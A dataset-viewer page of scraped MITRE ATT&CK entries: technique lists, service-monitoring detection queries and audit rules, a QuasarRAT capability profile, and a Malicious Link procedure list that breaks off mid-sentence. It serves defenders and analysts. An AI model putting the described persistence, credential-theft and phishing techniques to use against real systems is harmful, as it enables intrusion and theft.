Dataset Viewer
Auto-converted to Parquet Duplicate
text
stringlengths
2.8k
880k
source
stringlengths
3
116
Currently viewing ATT&CK v9.0 which was live between April 29, 2021 and October 20, 2021. Learn more about the versioning system or see the live site. TECHNIQUES Enterprise Reconnaissance Active Scanning Scanning IP Blocks Vulnerability Scanning Gather Victim Host Information Hardware Software Firmware Client Configurations Gather Victim Identity Information Credentials Email Addresses Employee Names Gather Victim Network Information Domain Properties DNS Network Trust Dependencies Network Topology IP Addresses Network Security Appliances Gather Victim Org Information Determine Physical Locations Business Relationships Identify Business Tempo Identify Roles Phishing for Information Spearphishing Service Spearphishing Attachment Spearphishing Link Search Closed Sources Threat Intel Vendors Purchase Technical Data Search Open Technical Databases DNS/Passive DNS WHOIS Digital Certificates CDNs Scan Databases Search Open Websites/Domains Social Media Search Engines Search Victim-Owned Websites Resource Development Acquire Infrastructure Domains DNS Server Virtual Private Server Server Botnet Web Services Compromise Accounts Social Media Accounts Email Accounts Compromise Infrastructure Domains DNS Server Virtual Private Server Server Botnet Web Services Develop Capabilities Malware Code Signing Certificates Digital Certificates Exploits Establish Accounts Social Media Accounts Email Accounts Obtain Capabilities Malware Tool Code Signing Certificates Digital Certificates Exploits Vulnerabilities Stage Capabilities Upload Malware Upload Tool Install Digital Certificate Drive-by Target Link Target Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Phishing Spearphishing Attachment Spearphishing Link Spearphishing via Service Replication Through Removable Media Supply Chain Compromise Compromise Software Dependencies and Development Tools Compromise Software Supply Chain Compromise Hardware Supply Chain Trusted Relationship Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Execution Command and Scripting Interpreter PowerShell AppleScript Windows Command Shell Unix Shell Visual Basic Python JavaScript Network Device CLI Container Administration Command Deploy Container Exploitation for Client Execution Inter-Process Communication Component Object Model Dynamic Data Exchange Native API Scheduled Task/Job At (Linux) At (Windows) Cron Launchd Scheduled Task Systemd Timers Container Orchestration Job Shared Modules Software Deployment Tools System Services Launchctl Service Execution User Execution Malicious Link Malicious File Malicious Image Windows Management Instrumentation Persistence Account Manipulation Additional Cloud Credentials Exchange Email Delegate Permissions Add Office 365 Global Administrator Role SSH Authorized Keys BITS Jobs Boot or Logon Autostart Execution Registry Run Keys / Startup Folder Authentication Package Time Providers Winlogon Helper DLL Security Support Provider Kernel Modules and Extensions Re-opened Applications LSASS Driver Shortcut Modification Port Monitors Plist Modification Print Processors XDG Autostart Entries Active Setup Boot or Logon Initialization Scripts Logon Script (Windows) Logon Script (Mac) Network Logon Script RC Scripts Startup Items Browser Extensions Compromise Client Software Binary Create Account Local Account Domain Account Cloud Account Create or Modify System Process Launch Agent Systemd Service Windows Service Launch Daemon Event Triggered Execution Change Default File Association Screensaver Windows Management Instrumentation Event Subscription Unix Shell Configuration Modification Trap LC_LOAD_DYLIB Addition Netsh Helper DLL Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Image File Execution Options Injection PowerShell Profile Emond Component Object Model Hijacking External Remote Services Hijack Execution Flow DLL Search Order Hijacking DLL Side-Loading Dylib Hijacking Executable Installer File Permissions Weakness Dynamic Linker Hijacking Path Interception by PATH Environment Variable Path Interception by Search Order Hijacking Path Interception by Unquoted Path Services File Permissions Weakness Services Registry Permissions Weakness COR_PROFILER Implant Internal Image Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Office Application Startup Office Template Macros Office Test Outlook Forms Outlook Home Page Outlook Rules Add-ins Pre-OS Boot System Firmware Component Firmware Bootkit ROMMONkit TFTP Boot Scheduled Task/Job At (Linux) At (Windows) Cron Launchd Scheduled Task Systemd Timers Container Orchestration Job Server Software Component SQL Stored Procedures Transport Agent Web Shell Traffic Signaling Port Knocking Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Privilege Escalation Abuse Elevation Control Mechanism Setuid and Setgid Bypass User Account Control Sudo and Sudo Caching Elevated Execution with Prompt Access Token Manipulation Token Impersonation/Theft Create Process with Token Make and Impersonate Token Parent PID Spoofing SID-History Injection Boot or Logon Autostart Execution Registry Run Keys / Startup Folder Authentication Package Time Providers Winlogon Helper DLL Security Support Provider Kernel Modules and Extensions Re-opened Applications LSASS Driver Shortcut Modification Port Monitors Plist Modification Print Processors XDG Autostart Entries Active Setup Boot or Logon Initialization Scripts Logon Script (Windows) Logon Script (Mac) Network Logon Script RC Scripts Startup Items Create or Modify System Process Launch Agent Systemd Service Windows Service Launch Daemon Domain Policy Modification Group Policy Modification Domain Trust Modification Escape to Host Event Triggered Execution Change Default File Association Screensaver Windows Management Instrumentation Event Subscription Unix Shell Configuration Modification Trap LC_LOAD_DYLIB Addition Netsh Helper DLL Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Image File Execution Options Injection PowerShell Profile Emond Component Object Model Hijacking Exploitation for Privilege Escalation Hijack Execution Flow DLL Search Order Hijacking DLL Side-Loading Dylib Hijacking Executable Installer File Permissions Weakness Dynamic Linker Hijacking Path Interception by PATH Environment Variable Path Interception by Search Order Hijacking Path Interception by Unquoted Path Services File Permissions Weakness Services Registry Permissions Weakness COR_PROFILER Process Injection Dynamic-link Library Injection Portable Executable Injection Thread Execution Hijacking Asynchronous Procedure Call Thread Local Storage Ptrace System Calls Proc Memory Extra Window Memory Injection Process Hollowing Process Doppelgänging VDSO Hijacking Scheduled Task/Job At (Linux) At (Windows) Cron Launchd Scheduled Task Systemd Timers Container Orchestration Job Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Defense Evasion Abuse Elevation Control Mechanism Setuid and Setgid Bypass User Account Control Sudo and Sudo Caching Elevated Execution with Prompt Access Token Manipulation Token Impersonation/Theft Create Process with Token Make and Impersonate Token Parent PID Spoofing SID-History Injection BITS Jobs Build Image on Host Deobfuscate/Decode Files or Information Deploy Container Direct Volume Access Domain Policy Modification Group Policy Modification Domain Trust Modification Execution Guardrails Environmental Keying Exploitation for Defense Evasion File and Directory Permissions Modification Windows File and Directory Permissions Modification Linux and Mac File and Directory Permissions Modification Hide Artifacts Hidden Files and Directories Hidden Users Hidden Window NTFS File Attributes Hidden File System Run Virtual Instance VBA Stomping Hijack Execution Flow DLL Search Order Hijacking DLL Side-Loading Dylib Hijacking Executable Installer File Permissions Weakness Dynamic Linker Hijacking Path Interception by PATH Environment Variable Path Interception by Search Order Hijacking Path Interception by Unquoted Path Services File Permissions Weakness Services Registry Permissions Weakness COR_PROFILER Impair Defenses Disable or Modify Tools Disable Windows Event Logging Impair Command History Logging Disable or Modify System Firewall Indicator Blocking Disable or Modify Cloud Firewall Disable Cloud Logs Indicator Removal on Host Clear Windows Event Logs Clear Linux or Mac System Logs Clear Command History File Deletion Network Share Connection Removal Timestomp Indirect Command Execution Masquerading Invalid Code Signature Right-to-Left Override Rename System Utilities Masquerade Task or Service Match Legitimate Name or Location Space after Filename Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Modify Cloud Compute Infrastructure Create Snapshot Create Cloud Instance Delete Cloud Instance Revert Cloud Instance Modify Registry Modify System Image Patch System Image Downgrade System Image Network Boundary Bridging Network Address Translation Traversal Obfuscated Files or Information Binary Padding Software Packing Steganography Compile After Delivery Indicator Removal from Tools Pre-OS Boot System Firmware Component Firmware Bootkit ROMMONkit TFTP Boot Process Injection Dynamic-link Library Injection Portable Executable Injection Thread Execution Hijacking Asynchronous Procedure Call Thread Local Storage Ptrace System Calls Proc Memory Extra Window Memory Injection Process Hollowing Process Doppelgänging VDSO Hijacking Rogue Domain Controller Rootkit Signed Binary Proxy Execution Compiled HTML File Control Panel CMSTP InstallUtil Mshta Msiexec Odbcconf Regsvcs/Regasm Regsvr Rundll Verclsid Signed Script Proxy Execution PubPrn Subvert Trust Controls Gatekeeper Bypass Code Signing SIP and Trust Provider Hijacking Install Root Certificate Mark-of-the-Web Bypass Code Signing Policy Modification Template Injection Traffic Signaling Port Knocking Trusted Developer Utilities Proxy Execution MSBuild Unused/Unsupported Cloud Regions Use Alternate Authentication Material Application Access Token Pass the Hash Pass the Ticket Web Session Cookie Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Virtualization/Sandbox Evasion System Checks User Activity Based Checks Time Based Evasion Weaken Encryption Reduce Key Space Disable Crypto Hardware XSL Script Processing Credential Access Brute Force Password Guessing Password Cracking Password Spraying Credential Stuffing Credentials from Password Stores Keychain Securityd Memory Credentials from Web Browsers Windows Credential Manager Password Managers Exploitation for Credential Access Forced Authentication Forge Web Credentials Web Cookies SAML Tokens Input Capture Keylogging GUI Input Capture Web Portal Capture Credential API Hooking Man-in-the-Middle LLMNR/NBT-NS Poisoning and SMB Relay ARP Cache Poisoning Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Network Sniffing OS Credential Dumping LSASS Memory Security Account Manager NTDS LSA Secrets Cached Domain Credentials DCSync Proc Filesystem /etc/passwd and /etc/shadow Steal Application Access Token Steal or Forge Kerberos Tickets Golden Ticket Silver Ticket Kerberoasting AS-REP Roasting Steal Web Session Cookie Two-Factor Authentication Interception Unsecured Credentials Credentials In Files Credentials in Registry Bash History Private Keys Cloud Instance Metadata API Group Policy Preferences Container API Discovery Account Discovery Local Account Domain Account Email Account Cloud Account Application Window Discovery Browser Bookmark Discovery Cloud Infrastructure Discovery Cloud Service Dashboard Cloud Service Discovery Container and Resource Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Local Groups Domain Groups Cloud Groups Process Discovery Query
versions_v9_techniques_T1574_007.txt
systemctl service creation sourcetype=auditd(command="systemctl" AND command="enable" OR command="create")| stats count by user, command, process_name, _time| where NOT match(command, "whitelisted_services")| sort -_time Service: Service Metadata Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc. Service: Service Metadata Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc. Domain ID Name Detects Enterprise T BITS Jobs BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).[7] Enterprise T Hijack Execution Flow Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. . Executable Installer File Permissions Weakness Monitor for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. . Services File Permissions Weakness Hashing of binaries and service executables could be used to detect replacement against historical data. Enterprise T Impair Defenses Monitor contextual data about a service/daemon, which may include information such as name, service executable, start type that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. . Disable or Modify Tools Monitor for telemetry that provides context of security software services being disabled or modified. In cloud environments, monitor virtual machine logs for the status of cloud security agents. Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation.Note: Windows Event code 7036 from the System log identifies if a service has stopped or started. This analytic looks for "Windows Defender" or "Windows Firewall" that has stopped. Analytic 1 - User Activity from Stopping Windows Defensive Services (source="WinEventLog:System" EventCode="7036") ServiceName="Windows Defender" OR ServiceName="Windows Firewall" AND ServiceName="stopped*" Enterprise T Inhibit System Recovery Monitor the status of services involved in system recovery. Note: For Windows, Event ID 7040 can be used to alert on changes to the start type of a service (e.g., going from enabled at startup to disabled) associated with system recovery. Enterprise T Masquerading Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc. . Masquerade Task or Service Monitor for changes made to services for unexpected modifications to names, descriptions, and/or start types Enterprise T . Remote Services: Windows Remote Management Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. sourcetype="WinEventLog:System" EventCode=7045| search ServiceName="WinRM"| stats count by AccountName, ServiceName, ServiceFileName, _time| where count > 1| eval service_change=if(match(ServiceFileName, "winrm.exe"), "suspicious", "normal")| where service_change="suspicious"| table _time, AccountName, ServiceName, ServiceFileName, service_change Enterprise T Service Stop Alterations to the service binary path or the service startup type changed to disabled may be suspicious. ICS T Service Stop Alterations to the service binary path or the service startup type changed to disabled may be suspicious. Service: Service Modification Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations. *Data Collection Measures: * - Windows Event Logs - Event ID 7040 - Detects modifications to the startup behavior of a service. - Event ID 7045 - Can capture changes made to existing services. - Event ID 7036 - Tracks when services start or stop, potentially indicating malicious tampering. - Event ID 4697 - Can detect when an adversary reinstalls a service with different parameters. - Sysmon Logs - Sysmon Event ID 13 - Detects changes to service configurations in the Windows Registry (e.g., HKLM\SYSTEM\CurrentControlSet\Services\). - Sysmon Event ID 1 - Can track execution of sc.exe or PowerShell Set-Service. - PowerShell Logging - Event ID 4104 (Script Block Logging) - Captures execution of commands like Set-Service, New-Service, or sc config. - Command-Line Logging (Event ID 4688) - Tracks usage of service modification commands: - sc config <service_name> start= auto - sc qc <service_name> - Linux/macOS Collection Methods - Systemd Journals (journalctl -u <service_name>) Tracks modifications to systemd service configurations. - Daemon Logs (/var/log/syslog, /var/log/messages, /var/log/daemon.log) Captures changes to service state and execution parameters. - AuditD Rules for Service Modification - Monitor modifications to /etc/systemd/system/ for new or altered service unit files: auditctl -w /etc/systemd/system/ -p wa -k service_modification - Track execution of systemctl or service commands: auditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl -F key=service_mod - OSQuery for Linux/macOS Monitoring - Query modified services using OSQuery’s processes or system_info tables: SELECT * FROM systemd_units WHERE state != 'running'; - macOS Launch Daemon/Agent Modification - Monitor for changes in: - /Library/LaunchDaemons/ - /Library/LaunchAgents/ - Track modifications to .plist files indicating persistence attempts. Service: Service Modification Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations. *Data Collection Measures: * - Windows Event Logs - Event ID 7040 - Detects modifications to the startup behavior of a service. - Event ID 7045 - Can capture changes made to existing services. - Event ID 7036 - Tracks when services start or stop, potentially indicating malicious tampering. - Event ID 4697 - Can detect when an adversary reinstalls a service with different parameters. - Sysmon Logs - Sysmon Event ID 13 - Detects changes to service configurations in the Windows Registry (e.g., HKLM\SYSTEM\CurrentControlSet\Services\). - Sysmon Event ID 1 - Can track execution of sc.exe or PowerShell Set-Service. - PowerShell Logging - Event ID 4104 (Script Block Logging) - Captures execution of commands like Set-Service, New-Service, or sc config. - Command-Line Logging (Event ID 4688) - Tracks usage of service modification commands: - sc config <service_name> start= auto - sc qc <service_name> - Linux/macOS Collection Methods - Systemd Journals (journalctl -u <service_name>) Tracks modifications to systemd service configurations. - Daemon Logs (/var/log/syslog, /var/log/messages, /var/log/daemon.log) Captures changes to service state and execution parameters. - AuditD Rules for Service Modification - Monitor modifications to /etc/systemd/system/ for new or altered service unit files: auditctl -w /etc/systemd/system/ -p wa -k service_modification - Track execution of systemctl or service commands: auditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl -F key=service_mod - OSQuery for Linux/macOS Monitoring - Query modified services using OSQuery’s processes or system_info tables: SELECT * FROM systemd_units WHERE state != 'running'; - macOS Launch Daemon/Agent Modification - Monitor for changes in: - /Library/LaunchDaemons/ - /Library/LaunchAgents/ - Track modifications to .plist files indicating persistence attempts. Domain ID Name Detects Enterprise T Create or Modify System Process Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. . Launch Agent Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence. . Systemd Service Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. . Windows Service Monitor for changes made to Windows services to repeatedly execute malicious payloads as part of persistence. . Launch Daemon Monitor services for changes made to Launch Daemons to execute malicious payloads as part of persistence. Enterprise T . Hijack Execution Flow: Services Registry Permissions Weakness Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. ICS T Masquerading Monitor for changes made to services that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. References - Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021. - The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021. - Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019. - Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017. - Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018. - Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018. - Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. × load more results
versions_v17_datasources_DS0019.txt
Locker Raindrop RainyDay Ramsay RARSTONE RATANKBA RawDisk RawPOS Rclone RCSAndroid RCSession RDAT RDFSNIFFER Reaver Red Alert 2. RedDrop RedLeaves Reg RegDuke Regin Remcos Remexi RemoteCMD RemoteUtilities Remsec Responder Revenge RAT REvil RGDoor Rifdoor Riltok RIPTIDE Rising Sun ROADTools RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT Ryuk S-T S-Type Saint Bot Sakula SamSam schtasks SDBbot SDelete SeaDuke Seasalt SEASHARPEE ServHelper Seth-Locker ShadowPad Shamoon Shark SharpStage SHARPSTATS ShiftyBug ShimRat ShimRatReporter SHIPSHAPE SHOTPUT SHUTTERSPEED Sibot SideTwist SILENTTRINITY SilkBean Siloscape SimBad Skeleton Key Skidmap Skygofree Sliver SLOTHFULMEDIA SLOWDRIFT Small Sieve Smoke Loader SMOKEDHAM SNUGRIDE Socksbot SodaMaster SombRAT SoreFang SOUNDBITE SPACESHIP Spark SpeakUp SpicyOmelette spwebmember SpyDealer SpyNote RAT sqlmap SQLRat Squirrelwaffle SslMM Starloader STARWHALE Stealth Mango StoneDrill StreamEx StrifeWater StrongPity Stuxnet SUGARDUMP SUGARUSH SUNBURST SUNSPOT SUPERNOVA Sykipot SynAck SYNful Knock Sys SYSCON Systeminfo SysUpdate T Taidoor TAINTEDSCRIBE TajMahal Tangelo Tarrask Tasklist TDTESS TEARDROP TERRACOTTA TEXTMATE ThiefQuest ThreatNeedle Tiktok Pro TinyTurla TINYTYPHON TinyZBot Tomiris Tor Torisma TrailBlazer Triada TrickBot TrickMo Triton Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TSCookie Turian TURNEDUP Twitoor TYPEFRAME U-V UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBferry USBStealer Valak VaporRage Vasport VBShower VERMIN ViceLeaker ViperRAT Volgmer VPNFilter W-X WannaCry WarzoneRAT WastedLocker Waterbear WEBC WellMail WellMess Wevtutil WhisperGate Wiarp Windows Credential Editor WINDSHIELD WindTail WINERACK Winexe Wingbird WinMM Winnti for Linux Winnti for Windows Wiper WireLurker WolfRAT X-Agent for Android XAgentOSX Xbash Xbot xCaon xCmd XcodeGhost XCSSET XLoader for Android XLoader for iOS XTunnel Y-Z YAHOYAH YiSpecter yty Zebrocy Zen ZergHelper Zeroaccess ZeroT Zeus Panda ZLib Zox zwShell ZxShell ZxxZ - Home - Software - QuasarRAT QuasarRAT QuasarRAT is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. QuasarRAT is developed in the C# language.[1][2] ID: S ⓘ Associated Software: xRAT ⓘ Type: TOOL ⓘ Platforms: Windows Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet Version: 2. Created: 17 October Last Modified: 02 August Version Permalink Live Version Associated Software Descriptions Name Description xRAT [3][4] ATT&CK® Navigator Layers Enterprise Layer download view Techniques Used Domain ID Name Use Enterprise T . Abuse Elevation Control Mechanism: Bypass User Account Control QuasarRAT can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.[5] Enterprise T . Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder If the QuasarRAT client process does not have administrator privileges it will add a registry key to HKCU\Software\Microsoft\Windows\CurrentVersion\Run for persistence.[1][5] Enterprise T . Command and Scripting Interpreter: Windows Command Shell QuasarRAT can launch a remote shell to execute commands on the victim’s machine.[1][5] Enterprise T Credentials from Password Stores QuasarRAT can obtain passwords from common FTP clients.[1][2] . Credentials from Web Browsers QuasarRAT can obtain passwords from common web browsers.[1][2] Enterprise T Data from Local System QuasarRAT can retrieve files from compromised client machines.[5] Enterprise T . Encrypted Channel: Symmetric Cryptography QuasarRAT uses AES with a hardcoded pre-shared key to encrypt network communication.[1][2][5] Enterprise T . Hide Artifacts: Hidden Files and Directories QuasarRAT has the ability to set file attributes to "hidden" to hide files from the compromised user's view in Windows File Explorer.[5] . Hide Artifacts: Hidden Window QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A though QuasarRAT can only be run on Windows systems.[5] Enterprise T Ingress Tool Transfer QuasarRAT can download files to the victim’s machine and execute them.[1][2] Enterprise T . Input Capture: Keylogging QuasarRAT has a built-in keylogger.[1][2] Enterprise T Modify Registry QuasarRAT has a command to edit the Registry on the victim’s machine.[1][5] Enterprise T Non-Application Layer Protocol QuasarRAT can use TCP for C2 communication.[5] Enterprise T Non-Standard Port QuasarRAT can use port 4782 on the compromised host for TCP callbacks.[5] Enterprise T Proxy QuasarRAT can communicate over a reverse proxy using SOCKS5.[1][2] Enterprise T . Remote Services: Remote Desktop Protocol QuasarRAT has a module for performing remote desktop access.[1][2] Enterprise T . Scheduled Task/Job: Scheduled Task QuasarRAT contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.[2][5] Enterprise T . Subvert Trust Controls: Code Signing A QuasarRAT .dll file is digitally signed by a certificate from AirVPN.[2] Enterprise T System Information Discovery QuasarRAT can gather system information from the victim’s machine including the OS type.[1] Enterprise T System Location Discovery QuasarRAT can determine the country a victim host is located in.[5] Enterprise T System Network Configuration Discovery QuasarRAT has the ability to enumerate the Wide Area Network (WAN) IP through requests to ip-api[.]com, freegeoip[.]net, or api[.]ipify[.]org observed with user-agent string Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0.[5] Enterprise T System Owner/User Discovery QuasarRAT can enumerate the username and account type.[5] Enterprise T . Unsecured Credentials: Credentials In Files QuasarRAT can obtain passwords from FTP clients.[1][2] Enterprise T Video Capture QuasarRAT can perform webcam viewing.[1][2] Groups That Use This Software ID Name References G menuPass [6][7][4] G Patchwork [3][2] G BackdoorDiplomacy [8] G Gorgon Group [9] G LazyScripter [10] References - MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018. - Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. - Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. - GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. - CISA. (2018, December 18). Analysis Report (AR18-352A) Quasar Open-Source Remote Administration Tool. Retrieved August 1, 2022. - United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019. - Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020. - Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, - Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018. - Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. × load more results
versions_v12_software_S0262.txt
Currently viewing ATT&CK v17.1 which is the current version of ATT&CK. Learn more about the versioning system or see the live site. ATT&CKcon 6.0 is coming October 14-15 in McLean, VA and live online. To potentially join us on stage, submit to our CFP by July 9th - Home - Techniques - Enterprise - User Execution - Malicious Link User Execution: Malicious Link Other sub-techniques of User Execution (4) ID Name T1204. Malicious Link T1204. Malicious File T1204. Malicious Image T1204. Malicious Copy and Paste An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File. ID: T1204. Sub-technique of: T ⓘ Tactic: Execution ⓘ Platforms: Linux, Windows, macOS Version: 1. Created: 11 March Last Modified: 15 April Version Permalink Live Version Procedure Examples ID Name Description S AppleJeus AppleJeus's spearphishing links required user interaction to navigate to the malicious website.[1] G APT APT28 has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.[2][3] G APT APT29 has used various forms of spearphishing attempting to get a user to click on a malicious link.[4][5] G APT APT3 has lured victims into clicking malicious links delivered through spearphishing.[6] G APT APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.[7][8][9] G APT APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.[10][11] G APT APT38 has used links to execute a malicious Visual Basic script.[12] G APT APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link.[13][14] S BackConfig BackConfig has compromised victims via links to URLs hosting malicious content.[15] S Bazar Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.[16][17][18] G BlackTech BlackTech has used e-mails with malicious links to lure victims into installing malware.[19] S Bumblebee Bumblebee has relied upon a user downloading a file from a OneDrive link for execution.[20][21] C C During C0011, Transparent Tribe relied on student targets to click on a malicious link sent via email.[22] C C During C0021, the threat actors lured users into clicking a malicious link which led to the download of a ZIP archive containing a malicious .LNK file.[23] G Cobalt Group Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.[24][25][26] G Confucius Confucius has lured victims into clicking on a malicious link sent through spearphishing.[27] G Daggerfly Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.[28] G Earth Lusca Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.[29] G Elderwood Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links.[30][31] S Emotet Emotet has relied upon users clicking on a malicious link delivered through spearphishing.[32][33] G Evilnum Evilnum has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.[34] G EXOTIC LILY EXOTIC LILY has used malicious links to lure users into executing malicious payloads.[35] G FIN FIN4 has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).[36][37] G FIN FIN7 has used malicious links to lure victims into downloading malware.[38] G FIN FIN8 has used emails with malicious links to lure victims into installing malware.[39][40][41] G Gamaredon Group Gamaredon Group has attempted to get users to click on a link pointing to a malicious HTML file leading to follow-on malicious content.[42] S Gootloader Gootloader has been executed through malicious links presented to users as internet search results.[43][44] S Grandoreiro Grandoreiro has used malicious links to gain execution on victim machines.[45][46] S GuLoader GuLoader has relied upon users clicking on links to malicious documents.[47] S Hancitor Hancitor has relied upon users clicking on a malicious link delivered through phishing.[48] S Javali Javali has achieved execution through victims clicking links to malicious websites.[49] S Kerrdown Kerrdown has gained execution through victims opening malicious links.[9] G Kimsuky Kimsuky has lured victims into clicking malicious links.[50] S KOCTOPUS KOCTOPUS has relied on victims clicking on a malicious link delivered via email.[51] S Latrodectus Latrodectus has been executed through malicious links distributed in email campaigns.[52][53] G LazyScripter LazyScripter has relied upon users clicking on links to malicious files.[51] G Leviathan Leviathan has sent spearphishing email links attempting to get a user to click.[54][55] G LuminousMoth LuminousMoth has lured victims into clicking malicious Dropbox download links delivered through spearphishing.[56] G Machete Machete has has relied on users opening malicious links delivered through spearphishing to execute malware.[57][58][59] G Magic Hound Magic Hound has attempted to lure victims into opening malicious links embedded in emails.[60][61] S Melcoz Melcoz has gained execution through victims opening malicious links.[49] G Mofang Mofang's spearphishing emails required a user to click the link to connect to a compromised website.[62] G Molerats Molerats has sent malicious links via email trick users into opening a RAR archive and running an executable.[63][64] G MuddyWater MuddyWater has distributed URLs in phishing e-mails that link to lure documents.[65][66][67] G Mustang Panda Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.[68][69][70] G Mustard Tempest Mustard Tempest has lured users into downloading malware through malicious links in fake advertisements and spearphishing emails.[71][72] S NETWIRE NETWIRE has been executed through convincing victims into clicking malicious links.[73][47] C Night Dragon During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware.[74] S ObliqueRAT ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.[75][76] G OilRig OilRig has delivered malicious links to achieve execution on the target system.[77][78][79][80] C Operation Dream Job During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[81][82] C Operation Dust Storm During Operation Dust Storm, the threat actors relied on a victim clicking on a malicious link sent via email.[83] C Operation Spalax During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails.[84] S OutSteel OutSteel has relied on a user to click a malicious link within a spearphishing email.[85] G Patchwork Patchwork has used spearphishing with links to try to get users to click, download and open malicious files.[86][87][88][15] S PLEAD PLEAD has been executed via malicious links in e-mails.[19] S Pony Pony has attempted to lure targets into clicking links in spoofed emails from legitimate banks.[89] S QakBot QakBot has gained execution through users opening malicious links.[90][91][92][93][94][95][96] G RedCurl RedCurl has used malicious links to infect the victim machines.[97][98] C RedDelta Modified PlugX Infection Chain Operations Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a 